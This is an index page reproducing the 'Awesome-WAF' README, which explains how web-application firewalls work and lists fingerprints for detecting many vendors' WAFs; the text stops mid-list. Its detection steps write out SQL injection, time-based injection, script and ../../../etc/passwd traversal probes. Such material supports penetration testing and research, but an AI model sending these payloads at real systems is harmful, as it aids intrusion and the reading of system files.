Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/0xInfection/Awesome-WAF
🔥 Web-application firewalls (WAFs) from security standpoint.
https://github.com/0xInfection/Awesome-WAF
List: Awesome-WAF
awesome awesome-list bypass-waf firewall infosec security waf waf-bypass waf-detection waf-fingerprints waf-test waf-testing web-application-firewall
Last synced: about 1 month ago
JSON representation
🔥 Web-application firewalls (WAFs) from security standpoint.
- Host: GitHub
- URL: https://github.com/0xInfection/Awesome-WAF
- Owner: 0xInfection
- License: apache-2.0
- Created: 2019-01-08T04:57:06.000Z (almost 6 years ago)
- Default Branch: master
- Last Pushed: 2023-07-12T05:34:59.000Z (over 1 year ago)
- Last Synced: 2024-05-20T00:17:48.836Z (7 months ago)
- Topics: awesome, awesome-list, bypass-waf, firewall, infosec, security, waf, waf-bypass, waf-detection, waf-fingerprints, waf-test, waf-testing, web-application-firewall
- Language: Python
- Homepage:
- Size: 29 MB
- Stars: 5,967
- Watchers: 258
- Forks: 1,028
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Contributing: CONTRIBUTING.md
- License: LICENSE
- Code of conduct: CODE_OF_CONDUCT.md
Awesome Lists containing this project
- awesome-cybersec - Everything about web application firewalls (WAFs)
- ultimate-awesome - Awesome-WAF - 🔥 Web-application firewalls (WAFs) from security standpoint. (Other Lists / PowerShell Lists)
- awesome-hacking-lists - 0xInfection/Awesome-WAF - 🔥 Web-application firewalls (WAFs) from security standpoint. (Python)
- StarryDivineSky - 0xInfection/Awesome-WAF
README
# Awesome WAF [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg "Awesome")](https://github.com/0xinfection/awesome-waf)
Everything about web application firewalls (WAFs) from a security perspective. 🔥
>
> __Foreword:__ This was originally my own collection on WAFs. I am open-sourcing it in the hope that it will be useful for pentesters and researchers out there.As the saying goes, "the community just learns from each other."![Main Logo](images/how-wafs-work.png 'How wafs work')
__A Concise Definition:__ A firewall is a security policy enforcement point positioned between a web application and the client endpoint. This functionality can be implemented in software or hardware, running in an appliance device, or in a typical server running a common operating system. It may be a stand-alone device or integrated into other network components. *(Source: [PCI DSS IS 6.6](https://www.pcisecuritystandards.org/documents/information_supplement_6.6.pdf))*
A web-application firewall sits between a user and a webapp and is tasked to prevent any malicious activity from reaching the webapp. A WAF either filters out the malicious part of the request or just simply blocks it.
Feel free to [contribute](CONTRIBUTING.md).
### Contents:
- [Introduction](#introduction)
- [How WAFs Work](#how-wafs-work)
- [Operation Modes](#operation-modes)
- [Testing Methodology](#testing-methodology)
- [Where To Look](#where-to-look)
- [Detection Techniques](#detection-techniques)
- [WAF Fingerprints](#waf-fingerprints)
- [Evasion Techniques](#evasion-techniques)
- [Fuzzing/Bruteforcing](#fuzzingbruteforcing)
- [Regex Reversing](#regex-reversing)
- [Obfuscation/Encoding](#obfuscation)
- [Browser Bugs](#browser-bugs)
- [HTTP Header Spoofing](#request-header-spoofing)
- [Google Dorks Approach](#google-dorks-approach)
- [Known Bypasses](#known-bypasses)
- [Awesome Tooling](#awesome-tools)
- [Fingerprinting](#fingerprinting)
- [Testing](#testing)
- [Evasion](#evasion)
- [Blogs & Writeups](#blogs-and-writeups)
- [Video Presentations](#video-presentations)
- [Research Presentations & Papers](#presentations--research-papers)
- [Research Papers](#research-papers)
- [Presentation Slides](#presentations)
- [Licensing & Credits](#credits--license)## Introduction:
### How WAFs Work:
- Using a set of rules to distinguish between normal requests and malicious requests.
- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.### Operation Modes:
- __Negative Model (Blacklist based)__ - A blacklisting model uses pre-set signatures to block requests that are clearly malicious. The signatures of WAFs operating in a negative model are specifically crafted to prevent attacks which exploit certain web application vulnerabilities. Blacklisting model web application firewalls are a great choice for web applications exposed to the public internet and are highly effective against major vulnerabilities. Eg. Rule for blocking all `*` inputs prevent basic cross-site scripting attacks.
- __Positive Model (Whitelist based)__ - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for blocking potential large scale attacks, but will also block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees.
- __Mixed/Hybrid Model (Inclusive model)__ - A hybrid security model blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet. A good scenario can be when web-application is facing the public internet (use blacklists) while the admin panel needs to be exposed to only a subset of users (use whitelists).## Testing Methodology:
### Where To Look:
- Always look out for common ports that expose that a WAF, namely `80`, `443`, `8000`, `8080` and `8888` ports. However, its important to note that a WAF can be easily deployed on any port running a HTTP service. It is good to enumerate HTTP service ports first hand and then look for WAFs.
- Some WAFs set their own cookies in requests (e.g. Citrix Netscaler, Yunsuo WAF).
- Some associate themselves with separate headers (e.g. Anquanbao WAF, Amazon AWS WAF).
- Some often alter headers and jumble characters to confuse attacker (e.g. Netscaler, Big-IP).
- Some expose themselves in the `Server` header (e.g. Approach, WTS WAF).
- Some WAFs expose themselves in the response content (e.g. DotDefender, Armor, Sitelock).
- Other WAFs reply with unusual response codes upon malicious requests (e.g. WebKnight, 360 WAF).### Detection Techniques:
To identify WAFs, we need to (dummy) provoke it.
1. Make a normal GET request from a browser, intercept and record response headers (specifically cookies).
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
3. Make GET requests to random open ports and grab banners which might expose the WAFs identity.
4. On login pages, inject common (easily detectable) payloads like `" or 1 = 1 --`.
5. Inject noisy payloads like `alert()` into search bars, contact forms and other input fields.
6. Attach a dummy `../../../etc/passwd` to a random parameter at end of URL.
7. Append some catchy keywords like `' OR SLEEP(5) OR '` at end of URLs to any random parameter.
8. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
9. Many a times, the WAF varies the `Server` header upon different types of interactions.
10. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
11. Side Channel Attacks - Examine the timing behaviour of the request and response content.
> __Tip:__ More details can be found in a [blogpost here](https://0xinfection.github.io/posts/fingerprinting-wafs-side-channel/).## WAF Fingerprints
Wanna fingerprint WAFs? Lets see how.
> __NOTE__: This section contains manual WAF detection techniques. You might want to switch over to [next section](#evasion-techniques).
WAF
Fingerprints
360
-
Detectability: Easy - Detection Methodology:
- Returns status code
493
upon unusual requests. - Blockpage may contain reference to
wzws-waf-cgi/
directory. - Blocked response page source may contain:
- Reference to
wangshan.360.cn
URL. -
Sorry! Your access has been intercepted because your links may threaten website security.
text snippet.
- Reference to
- Response headers may contain
X-Powered-By-360WZB
header. - Blocked response headers contain unique header
WZWS-Ray
. -
Server
header may contain valueqianxin-waf
.
aeSecure
-
Detectability: Moderate - Detection Methodology:
- Blocked response content contains
aesecure_denied.png
image (view source to see). - Response headers contain
aeSecure-code
value.
Airlock
-
Detectability: Moderate/Difficult - Detection Methodology:
-
Set-Cookie
headers may contain: -
AL-SESS
cookie field name (case insensitive). -
AL-LB
value (case insensitive). - Blocked response page contains:
-
Server detected a syntax error in your request
text. -
Check your request and all parameters
text snippet.
AlertLogic
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains:
-
We are sorry, but the page you are looking for cannot be found
text snippet. -
The page has either been removed, renamed or temporarily unavailable
text. -
404 Not Found
in red letters.
Aliyundun
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains:
-
Sorry, your request has been blocked as it may cause potential threats to the server's security
text snippet. - Reference to
errors.aliyun.com
site URL. - Blocked response code returned is
405
.
Anquanbao
-
Detectability: Easy - Detection Methodology:
- Returns blocked HTTP response code
405
upon malicious requests. - Blocked response content may contain
/aqb_cc/error/
orhidden_intercept_time
. - Response headers contain
X-Powered-by-Anquanbao
header field.
Anyu
-
Detectability: Easy - Detection Methodology:
- Blocked response content contains
Sorry! your access has been intercepted by AnYu
- Blocked response page contains
AnYu- the green channel
text. - Response headers may contain unusual header
WZWS-RAY
.
Approach
-
Detectability: Easy - Detection Methodology:
- Blocked response page content may contain:
-
Approach Web Application Firewall Framework
heading. -
Your IP address has been logged and this information could be used by authorities to track you.
warning. -
Sorry for the inconvenience!
keyword. -
Approach infrastructure team
text snippet. -
Server
header has field value set toApproach
.
Armor Defense
-
Detectability: Easy - Detection Methodology:
- Blocked response content contains:
-
This request has been blocked by website protection from Armor
text. -
If you manage this domain please create an Armor support ticket
snippet.
-
ArvanCloud
-
Detectability: Easy - Detection Methodology:
-
Server
header containsArvanCloud
keyword.
ASPA
-
Detectability: Easy - Detection Methodology:
-
Server
header containsASPA-WAF
keyword. - Response contain unique header
ASPA-Cache-Status
with contentHIT
orMISS
.
ASP.NET Generic
-
Detectability: Moderate - Detection Methodology:
- Response headers may contain
X-ASPNET-Version
header value. - Blocked response page content may contain:
-
This generic 403 error means that the authenticated user is not authorized to use the requested resource
. -
Error Code 0x00000000<
keyword. -
X-Powered-By
header has field value set toASP.NET
.
Astra
-
Detectability: Easy - Detection Methodology:
- Blocked response page content may contain:
-
Sorry, this is not allowed.
inh1
. -
our website protection system has detected an issue with your IP address and wont let you proceed any further
text snippet. - Reference to
www.getastra.com/assets/images/
URL. - Response cookies has field value
cz_astra_csrf_cookie
in response headers.
AWS ELB
-
Detectability: Moderate - Detection Methodology:
- Response headers might contain:
-
AWSALB
cookie field value. -
X-AMZ-ID
header. -
X-AMZ-REQUEST-ID
header.
-
- Response page may contain:
-
Access Denied
in their keyword. - Request token ID with length from 20 to 25 between
RequestId
tag.
-
-
Server
header field containsawselb/2.0
value.
Baidu Yunjiasu
-
Detectability: Moderate - Detection Methodology:
-
Server
header may containYunjiasu-nginx
value. -
Server
header may containYunjiasu
value.
Barikode
-
Detectability: Easy - Detection Methodology:
- Blocked response page content contains:
-
BARIKODE
keyword. -
Forbidden Access
text snippet inh1
.
-
Barracuda
-
Detectability: Moderate - Detection Methodology:
- Response cookies may contain
barra_counter_session
value. - Response headers may contain
barracuda_
keyword. - Response page contains:
-
You have been blocked
heading. -
You are unable to access this website
text.
Bekchy
-
Detectability: Easy - Detection Methodology:
- Blocked response headers contains
Bekchy - Access Denied
. - Blocked response page contains reference to
https://bekchy.com/report
.
BinarySec
-
Detectability: Moderate - Detection Methodology:
- Response headers contain:
-
X-BinarySec-Via
field. -
X-BinarySec-NoCache
field. -
Server
header containsBinarySec
keyword.
BitNinja
-
Detectability: Easy - Detection Methodology:
- Blocked response page may contain:
-
Security check by BitNinja
text snippet. -
your IP will be removed from BitNinja
. -
Visitor anti-robot validation
text snippet. -
(You will be challenged by a reCAPTCHA page)
text.
BIG-IP ASM
-
Detectability: Moderate - Detection Methodology:
- Response headers may contain
BigIP
orF5
keyword value. - Response header fields may contain
X-WA-Info
header. - Response headers might have jumbled
X-Cnection
field value.
BlockDos
-
Detectability: Moderate - Detection Methodology:
-
Server
header contains valueBlockDos.net
.
Bluedon IST
-
Detectability: Easy - Detection Methodology:
-
Server
header containsBDWAF
field value. - Blocked response page contains to
Bluedon Web Application Firewall
text snippet..
BulletProof Security Pro
-
Detectability: Moderate - Detection Methodology:
- Blocked response page contains:
-
div
with id asbpsMessage
text snippet. -
If you arrived here due to a search or clicking on a link click your Browser's back button to return to the previous page.
text snippet.
-
CDN NS Application Gateway
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains
CdnNsWAF Application Gateway
text snippet.
Cerber (WordPress)
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains:
-
We're sorry, you are not allowed to proceed
text snippet. -
Your request looks suspicious or similar to automated requests from spam posting software
warning.
-
Chaitin Safeline
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains
event_id
keyword within HTML comments.
ChinaCache
-
Detectability: Easy - Detection Methodology:
- Response headers contain
Powered-by-ChinaCache
field.
Cisco ACE XML Gateway
-
Detectability: Moderate - Detection Methodology:
-
Server
header has valueACE XML Gateway
set.
Cloudbric
-
Detectability: Moderate - Detection Methodology:
- Response content contains:
-
Malicious Code Detected
heading. -
Your request was blocked by Cloudbric
text snippet. - Reference to
https://cloudbric.zendesk.com
URL.
-
Cloudbric Help Center
text. - Page title starting with
Cloudbric | ERROR!
.
Cloudflare
-
Detectability: Easy - Detection Methodology:
- Response headers might have
cf-ray
field value. -
Server
header field has valuecloudflare
. -
Set-Cookie
response headers have__cfuid=
cookie field. - Page content might have
Attention Required!
orCloudflare Ray ID:
. - Page content may contain
DDoS protection by Cloudflare
as text. - You may encounter
CLOUDFLARE_ERROR_500S_BOX
upon hitting invalid URLs.
CloudfloorDNS
-
Detectability: Easy - Detection Methodology:
-
Server
header field has valueCloudfloorDNS WAF
. - Block-page title might have
CloudfloorDNS - Web Application Firewall Error
. - Page content may contain
www.cloudfloordns.com/contact
URL as a contact link.
Cloudfront
-
Detectability: Easy - Detection Methodology:
- Blocked response content contains
Generated by cloudfront (CloudFront)
error upon malicious request.
Comodo cWatch
-
Detectability: Easy - Detection Methodology:
-
Server
header containsProtected by COMODO WAF
value.
CrawlProtect
-
Detectability: Easy - Detection Methodology:
- Response cookies might contain
crawlprotect
cookie name. - Block Page title has
CrawlProtect
keyword in it. - Blocked response content contains value
This site is protected by CrawlProtect !!!
upon malicious request.
Deny-All
-
Detectability: Difficult - Detection Methodology:
- Response content contains value
Condition Intercepted
. -
Set-Cookie
header contains cookie fieldsessioncookie
.
Distil Web Protection
-
Detectability: Easy - Detection Methodology:
- Response headers contain field value
X-Distil-CS
in all requests. - Blocked response page contains:
-
Pardon Our Interruption...
heading. -
You have disabled javascript in your browser.
text snippet. -
Something about your browser made us think that you are a bot.
text.
DoSArrest Internet Security
-
Detectability: Easy - Detection Methodology:
- Response headers contain field value
X-DIS-Request-ID
. -
Server
header containsDOSarrest
keyword.
DotDefender
-
Detectability: Easy - Detection Methodology:
- Blocked response content contains value
dotDefender Blocked Your Request
. - Blocked response headers contain
X-dotDefender-denied
field value.
DynamicWeb Injection Check
-
Detectability: Easy - Detection Methodology:
- Blocked response headers contain
X-403-Status-By
field with valuedw-inj-check
value.
e3Learning Security
-
Detectability: Easy - Detection Methodology:
-
Server
header containse3Learning_WAF
keyword.
EdgeCast (Verizon)
-
Detectability: Easy - Detection Methodology:
- Blocked response content contains value
Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon)
. - Blocked response code returns
400 Bad Request
on malicious requests.
Eisoo Cloud
-
Detectability: Easy - Detection Methodology:
- Blocked response page content may contain:
-
/eisoo-firewall-block.css
reference. -
www.eisoo.com
URL. -
© (year) Eisoo Inc.
keyword. -
Server
header has field value set toEisooWAF-AZURE/EisooWAF
.
Expression Engine
-
Detectability: Difficult - Detection Methodology:
- Blocked response page returns
Invalid URI
generally. - Blocked response content contains value
Invalid GET Request
upon malicious GET queries. - Blocked POST type queries contain
Invalid Data
in response content.
F5 ASM
-
Detectability: Difficult - Detection Methodology:
- Blocked response content contains warning
The requested URL was rejected. Please consult with your administrator.
FortiWeb
-
Detectability: Moderate - Detection Methodology:
- Response headers contain
FORTIWAFSID=
on malicious requests. - Blocked response page contains:
- Reference to
.fgd_icon
image icon. -
Server Unavailable!
as heading. -
Server unavailable. Please visit later.
as text.
GoDaddy
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains value
Access Denied - GoDaddy Website Firewall
.
GreyWizard
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains:
-
Grey Wizard
as title. -
Contact the website owner or Grey Wizard
text snippet. -
We've detected attempted attack or non standard traffic from your IP address
text snippet.
-
-
Server
header containgreywizard
keyword.
Huawei Cloud
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains:
- Reference to
account.hwclouds.com/static/error/images/404img.jpg
error image. - Reference to
www.hwclouds.com
URL. - Reference to
hws_security@{site.tld}
e-mail for reporting.
HyperGuard
-
Detectability: Difficult - Detection Methodology:
-
Set-Cookie
header has cookie fieldODSESSION=
in response headers.
IBM DataPower
-
Detectability: Difficult - Detection Methodology:
- Response headers contains field value value
X-Backside-Transport
with valueOK
orFAIL
.
Imperva Incapsula
-
Detectability: Easy - Detection Methodology:
- Blocked response page content may contain:
-
Powered By Incapsula
text snippet. -
Incapsula incident ID
keyword. -
_Incapsula_Resource
keyword. -
subject=WAF Block Page
keyword. - Normal GET request headers contain
visid_incap
value. - Response headers may contain
X-Iinfo
header field name. -
Set-Cookie
header has cookie fieldincap_ses
andvisid_incap
.
Imunify360
-
Detectability: Easy - Detection Methodology:
-
Server
header containimunify360-webshield
keyword. - Response page contains:
-
Powered by Imunify360
text snippet. -
imunify360 preloader
if response type is JSON. - Blocked response page contains
protected by Imunify360
text.
IndusGuard
-
Detectability: Moderate - Detection Methodology:
-
Server
header contains valueIF_WAF
. - Blocked response content contains warning
further investigation and remediation with a screenshot of this page.
- Response headers contain a unique header
X-Version
.
Instart DX
-
Detectability: Easy - Detection Methodology:
- Response headers contain
X-Instart-Request-ID
unique header. - Response headers contain
X-Instart-WL
unique header fingerprint. - Response headers contain
X-Instart-Cache
unique header fingerprint. - Blocked response page contains
The requested URL was rejected. Please consult with your administrator.
text.
ISA Server
-
Detectability: Difficult - Detection Methodology:
- Response page contains:
-
The ISA Server denied the specified Uniform Resource Locator (URL)
text snippet. -
The server denied the specified Uniform Resource Locator (URL). Contact the server administrator.
text snippet
Janusec Application Gateway
-
Detectability: Easy - Detection Methodology:
- Blocked response page has image displaying
JANUSEC
name and logo. - Blocked response page displays
Janusec Application Gateway
on malicious requests.
Jiasule
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains reference to
static.jiasule.com/static/js/http_error.js
URL. -
Set-Cookie
header has cookie field__jsluid=
orjsl_tracking
in response headers. -
Server
header hasjiasule-WAF
keywords. - Blocked response content has
notice-jiasule
keyword.
KeyCDN
-
Detectability: Easy - Detection Methodology:
-
Server
header containsKeyCDN
keyword.
KnownSec
-
Detectability: Easy - Detection Methodology:
- Blocked response page displays
ks-waf-error.png
image (view source to see).
KONA Site Defender (Akamai)
-
Detectability: Easy - Detection Methodology:
-
Server
header containsAkamaiGHost
keyword.
LiteSpeed
-
Detectability: Easy - Detection Methodology:
-
Server
header has value set toLiteSpeed
. Response page contains:
-
Proudly powered by LiteSpeed Web Server
text. - Reference to
http://www.litespeedtech.com/error-page
Access to resource on this server is denied.
Malcare
-
Detectability: Moderate - Detection Methodology:
- Blocked response page may contains:
-
Blocked because of Malicious Activities
text snippet. -
Firewall powered by MalCare
text snippet.
-
MissionControl Application Shield
-
Detectability: Easy - Detection Methodology:
-
Server
header field containsMission Control Application Shield
value.
ModSecurity
-
Detectability: Moderate/Difficult - Detection Methodology:
- Blocked response page contains:
-
This error was generated by Mod_Security
text snippet. -
One or more things in your request were suspicious
text snippet. -
rules of the mod_security module
text snippet. -
mod_security rules triggered
text snippet. - Reference to
/modsecurity-errorpage/
directory. -
Server
header may containMod_Security
orNYOB
keywords. - Sometimes, the response code to an attack is
403
while the response phrase isModSecurity Action
.
ModSecurity CRS
-
Detectability: Difficult - Detection Methodology:
- Blockpage occurs on adding a separate request header
X-Scanner
when set to a particular paranoa level.
NAXSI
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains
This Request Has Been Blocked By NAXSI
. - Response headers contain unusual field
X-Data-Origin
with valuenaxsi/waf
keyword. -
Server
header containsnaxsi/waf
keyword value. - Blocked response page may contain
NAXSI blocked information
error code.
Nemesida
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains
Suspicious activity detected. Access to the site is blocked.
. - Contains reference to email
nwaf@{site.tld}
Netcontinuum
-
Detectability: Moderate - Detection Methodology:
- Session cookies contain
NCI__SessionId=
cookie field name.
NetScaler AppFirewall
-
Detectability: Moderate - Detection Methodology:
- Response headers may contain
-
Connection:
header field name jumbled tonnCoection:
-
ns_af=
cookie field name. -
citrix_ns_id
field name. -
NSC_
keyword. -
NS-CACHE
field value.
NevisProxy
-
Detectability: Moderate - Detection Methodology:
- Response header cookies contain
Navajo
keyword.
NewDefend
-
Detectability: Easy - Detection Methodology:
- Response page contains:
- Reference to
http://www.newdefend.com/feedback/misinformation/
URL. - Reference to
/nd_block/
directory. -
Server
header containsNewDefend
keyword.
Nexusguard
-
Detectability: Easy - Detection Methodology:
- Blocked response page has reference to
speresources.nexusguard.com/wafpage/index.html
URL.
NinjaFirewall
-
Detectability: Moderate - Detection Methodology:
- Response page title contains
NinjaFirewall: 403 Forbidden
. - Response page contains:
-
For security reasons, it was blocked and logged
text snippet. -
NinjaFirewall
keyword in title.
-
- Returns a
403 Forbidden
response upon malicious requests.
NSFocus
-
Detectability: Easy - Detection Methodology:
-
Server
header containNSFocus
keyword.
NullDDoS
-
Detectability: Easy - Detection Methodology:
-
Server
header contains theNullDDoS System
keyword.
onMessage Shield
-
Detectability: Easy - Detection Methodology:
- Response headers contain header
X-Engine
field with valueonMessage Shield
. - Blocked response page contains:
-
Blackbaud K-12 conducts routine maintenance
keyword. -
This site is protected by an enhanced security system
. - Reference to
https://status.blackbaud.com
URL. - Reference to
https://maintenance.blackbaud.com
URL.
OpenResty Lua WAF
-
Detectability: Easy - Detection Methodology:
-
Server
header containsopenresty/{version}
keyword. - Blocked response page contains
openresty/{version}
text. - Blocked response code returned is
406 Not Acceptable
.
Palo Alto
-
Detectability: Moderate - Detection Methodology:
- Blocked response page contains
Virus/Spyware Download Blocked
. - Response page might contain
Palo Alto Next Generation Security Platform
text snippet.
PentaWAF
-
Detectability: Easy - Detection Methodology:
-
Server
header containsPentaWAF/{version}
keyword. - Blocked response page contains text
PentaWAF/{version}
.
PerimeterX
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains reference to
https://www.perimeterx.com/whywasiblocked
URL.
pkSecurityModule IDS
-
Detectability: Moderate - Detection Methodology:
- Response content may contain
-
pkSecurityModule: Security.Alert
. -
A safety critical request was discovered and blocked
text snippet.
Positive Technologies Application Firewall
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains
Forbidden
inh1
followed by: -
Request ID:
in formatyyyy-mm-dd-hh-mm-ss-{ref. code}
PowerCDN
-
Detectability: Moderate - Detection Methodology:
- Response headers may contain
-
Via
header with contentpowercdn.com
. -
X-Cache
header with contentpowercdn.com
. -
X-CDN
header with contentPowerCDN
.
Profense
-
Detectability: Easy - Detection Methodology:
-
Set-Cookie
headers containPLBSID=
cookie field name. -
Server
header containProfense
keyword.
Proventia (IBM)
-
Detectability: Difficult - Detection Methodology:
- Blocked response page might contain to
request does not match Proventia rules
text snippet.
Puhui
-
Detectability: Easy - Detection Methodology:
-
Server
header containPuhuiWAF
keyword.
Qiniu CDN
-
Detectability: Easy - Detection Methodology:
- Response content may contain
- Response headers contain unusual header
X-Qiniu-CDN
with value set to either0
or1
.
Radware Appwall
-
Detectability: Moderate - Detection Methodology:
- Response page contains the following text snippet:
Unauthorized Activity Has Been Detected.
andCase Number
- Blocked response page has reference to
radwarealerting@{site.tld}
email. - Blocked response page has title set to
Unauthorized Request Blocked
. - Response headers may contain
X-SL-CompState
header field name.
Reblaze
-
Detectability: Moderate - Detection Methodology:
- Cookies in response headers contain
rbzid=
header field name. -
Server
field value might containReblaze Secure Web Gateway
text snippet. - Response page contains:
-
Access Denied (403)
in bold. -
Current session has been terminated
text. -
For further information, do not hesitate to contact us
.
Request Validation Mode
-
Detectability: Easy - Detection Methodology:
- A firewall found specifically on ASP.NET websites and none others.
- Response page contains either of the following text snippet:
ASP.NET has detected data in the request that is potentially dangerous.
Request Validation has detected a potentially dangerous client input value.
HttpRequestValidationException.
- Blocked response code returned is always
500 Internal Error
.
RSFirewall
-
Detectability: Easy - Detection Methodology:
- Response page contains:
-
COM_RSFIREWALL_403_FORBIDDEN
keyword. -
COM_RSFIREWALL_EVENT
keyword.
Sabre
-
Detectability: Easy - Detection Methodology:
- Returns status code
500 Internal Error
upon malicious requests. - Response content has:
- Contact email
[email protected]
. -
Your request has been blocked
bold warning. -
clicking the above email link will automatically add some important details to the email for us to investigate the problem
text snippet.
- Contact email
Safe3
-
Detectability: Easy - Detection Methodology:
- Response headers contain:
-
X-Powered-By
header has field valueSafe3WAF
. -
Server
header contains field value set toSafe3 Web Firewall
. - Response page contains
Safe3waf
keyword.
SafeDog
-
Detectability: Easy/Moderate - Detection Methodology:
-
Server
header in response may contain: -
WAF/2.0
keyword. -
safedog
field value.
SecKing
-
Detectability: Easy/Moderate - Detection Methodology:
-
Server
header in response may contain: -
SECKINGWAF
keyword. -
SECKING/{version}
field value.
SecuPress
-
Detectability: Easy - Detection Methodology:
- Response content may contain:
-
SecuPress
as text. -
Block ID: Bad URL Contents
as text. - Response code returned is
503 Service Unavailable
.
Secure Entry
-
Detectability: Easy - Detection Methodology:
-
Server
header contains value set toSecure Entry Server
.
SecureIIS
-
Detectability: Easy - Detection Methodology:
- Response page contains either of the following text snippet:
- Image displaying
beyondtrust
logo. Download SecureIIS Personal Edition
- Reference to
http://www.eeye.com/SecureIIS/
URL. -
SecureIIS Error
text snippet.
SecureSphere
-
Detectability: Difficult - Detection Methodology:
- Response page contains the following text snippet:
- Error in
h2
text. - Title contains only text as
Error
. -
Contact support for additional information.
text.
SEnginx
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains
SENGINX-ROBOT-MITIGATION
keyword.
ServerDefender VP
-
Detectability: Easy - Detection Methodology:
- Blocked response contains
X-Pint
header field withp80
keyword.
Shadow Daemon
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains
request forbidden by administrative rules.
keyword.
ShieldSecurity
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains:
-
You were blocked by the Shield.
text. -
Something in the URL, Form or Cookie data wasn't appropriate
text snippet. -
Warning: You have {number} remaining transgression(s) against this site
. -
Seriously stop repeating what you are doing or you will be locked out
.
-
SiteGround
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains
The page you are trying to access is restricted due to a security rule
text snippet.
SiteGuard (JP Secure)
-
Detectability: Difficult - Detection Methodology:
- Response page contains:
-
Powered by SiteGuard
text snippet. -
The server refuse to browse the page.
text snippet. The URL may not be correct. Please confirm the value.
-
SiteLock TrueShield
-
Detectability: Easy - Detection Methodology:
- Blocked response page source contains the following:
- Reference to
www.sitelock.com
URL. -
Sitelock is leader in Business Website Security Services.
text. -
sitelock-site-verification
keyword. -
sitelock_shield_logo
image.
SonicWall
-
Detectability: Easy - Detection Methodology:
-
Server
header containSonicWALL
keyword value. - Blocked response page contains either of the following text snippet:
- Image displaying
Dell
logo. This request is blocked by the SonicWALL.
-
Web Site Blocked
text snippet. -
nsa_banner
as keyword. :p
Sophos UTM
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains
Powered by UTM Web Protection
keyword.
SquareSpace
-
Detectability: Difficult - Detection Methodology:
- Response code returned is
404 Not Found
upon malicious requests. - Blocked response page contains either of the following text snippet:
-
BRICK-50
keyword. -
404 Not Found
text snippet.
SquidProxy IDS
-
Detectability: Easy - Detection Methodology:
-
Server
header contains field valuesquid/{version}
. - Blocked response page contains
Access control configuration prevents your request from being allowed at this time.
.
StackPath
-
Detectability: Easy - Detection Methodology:
- Contains image displaying
StackPath
logo. - Blocked response page contains
You performed an action that triggered the service and blocked your request
.
Stingray
-
Detectability: Difficult - Detection Methodology:
- Blocked response code returns
403 Forbidden
or500 Internal Error
. - Response headers contain the
X-Mapping
header field name.
Sucuri CloudProxy
-
Detectability: Easy - Detection Methodology:
- Response headers may contain
Sucuri
orCloudproxy
keywords. - Blocked response page contains the following text snippet:
-
Access Denied - Sucuri Website Firewall
text. - Reference to
https://sucuri.net/privacy-policy
URL. - Sometimes the email
[email protected]
. - Contains copyright notice
;copy {year} Sucuri Inc
. - Response headers contains
X-Sucuri-ID
header along with normal requests.
Synology Cloud
-
Detectability: Easy - Detection Methodology:
- Blocked response page has
Copyright (c) 2019 Synology Inc. All rights reserved.
as text.
Tencent Cloud
-
Detectability: Moderate - Detection Methodology:
- Blocked response code returns
405 Method Not Allowed
error. - Blocked response page contains reference to
waf.tencent-cloud.com
URL.
Teros
-
Detectability: Difficult - Detection Methodology:
- Response headers contain cookie field
st8id
.
TrafficShield
-
Detectability: Moderate - Detection Methodology:
-
Server
might containF5-TrafficShield
keyword. -
ASINFO=
value might be detected in response cookies.
TransIP
-
Detectability: Easy - Detection Methodology:
- Response headers contain unique header
X-TransIP-Backend
. - Response headers contain another header
X-TransIP-Balancer
.
UCloud UEWaf
-
Detectability: Easy - Detection Methodology:
- Response content might contain:
- Reference to
/uewaf_deny_pages/default/img/
inurl directory. -
ucloud.cn
URL.
- Reference to
- Response headers returned has
Server
header set touewaf/{version}
.
URLMaster SecurityCheck
-
Detectability: Moderate - Detection Methodology:
- Response headers might contain:
-
UrlMaster
keyword. -
UrlRewriteModule
keyword. -
SecurityCheck
keyword.
-
- Blocked response code returned is
400 Bad Request
text snippet.
URLScan
-
Detectability: Moderate - Detection Methodology:
-
- Blocked response page contains:
-
Rejected-by-URLScan
text snippet. -
Server Erro in Application
as heading. -
Module: IIS Web Core
in table.
USP Secure Entry
-
Detectability: Moderate - Detection Methodology:
- Response headers contain
Secure Entry Server
field value.
Varnish (OWASP)
-
Detectability: Easy - Detection Methodology:
- Malicious request returns
404 Not Found
Error. - Response page contains:
-
Request rejected by xVarnish-WAF
text snippet.
Varnish CacheWall
-
Detectability: Easy - Detection Methodology:
- Response page contains:
-
Error 403 Naughty, not Nice!
as heading. -
Varnish cache Server
as text.
Viettel
-
Detectability: Easy - Detection Methodology:
- Response page contains:
- Block page has title set to
Access denied · Viettel WAF
. - Reference to
https://cloudrity.com.vn/
URL. - Response page contains keywords
Viettel WAF system
. - Contact information reference to
https://cloudrity.com.vn/customer/#/contact
URL.
VirusDie
-
